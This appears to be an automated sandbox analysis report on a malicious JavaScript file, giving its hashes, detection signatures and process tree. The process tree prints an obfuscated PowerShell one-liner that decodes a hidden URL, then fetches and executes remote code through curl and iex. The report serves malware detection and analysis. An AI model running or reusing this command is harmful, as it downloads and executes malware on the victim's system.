Overview

overview

10

Static

static

1

45993588c9...8c5.js

windows7-x64

10

45993588c9...8c5.js

windows10-2004-x64

10

Analysis

  • max time kernel
    117s
  • max time network
    117s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21-12-2024 14:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    45993588c924a2a7f81a3768576c591204fbda2ab851adb3201012f25a8818c5.js

  • Size

    189KB

  • MD5

    cc8f13bc0f74a0baf3cc23853b48d60e

  • SHA1

    a5fa26c9a781d591ad8283d8c0a079f49d1a9221

  • SHA256

    45993588c924a2a7f81a3768576c591204fbda2ab851adb3201012f25a8818c5

  • SHA512

    35730ec8fa0f5413fd4ba3e30eaa8854f41507f1f0f9221035dd8ccb88d541b3606fe23cd118037f05fb067bab203f75ac8e657c3e4c2c31f013507de8a26321

  • SSDEEP

    3072:n+WQYnd7Dfa/WQHd7Dfatd7DfaXWQ9WQB:+h+Nfa/hHNfatNfaXh9hB

Score
10/10
execution

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\45993588c924a2a7f81a3768576c591204fbda2ab851adb3201012f25a8818c5.js
    1⤵
      PID:304
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell $yqjtnecma='ur' ;new-alias printout c$($yqjtnecma)l;$yfegcuz=(6548,6559,6567,6551,6553,6548,6568,6567,6572,6505,6567,6501,6548,6496,6566,6561,6562,6497,6499,6496,6562,6554,6562,6513,6565,6511,6559,6555,6560,6566,6565,6500,6499);$jmzdnkahi=('bronx','get-cmdlet');$ughpwfbqrx=$yfegcuz;foreach($ygjrowfpvzsam in $ughpwfbqrx){$krgbmvqhtxpu=$ygjrowfpvzsam;$sbxwamgqjyv=$sbxwamgqjyv+[char]($krgbmvqhtxpu-6450);$zpqcxie=$sbxwamgqjyv; $ycxdfapin=$zpqcxie};$bgfzptack[2]=$ycxdfapin;$hdbwpfvjy='rl';$hxmqrcwgva=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ycxdfapin)
      1⤵
      • Process spawned unexpected child process
      PID:2892

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads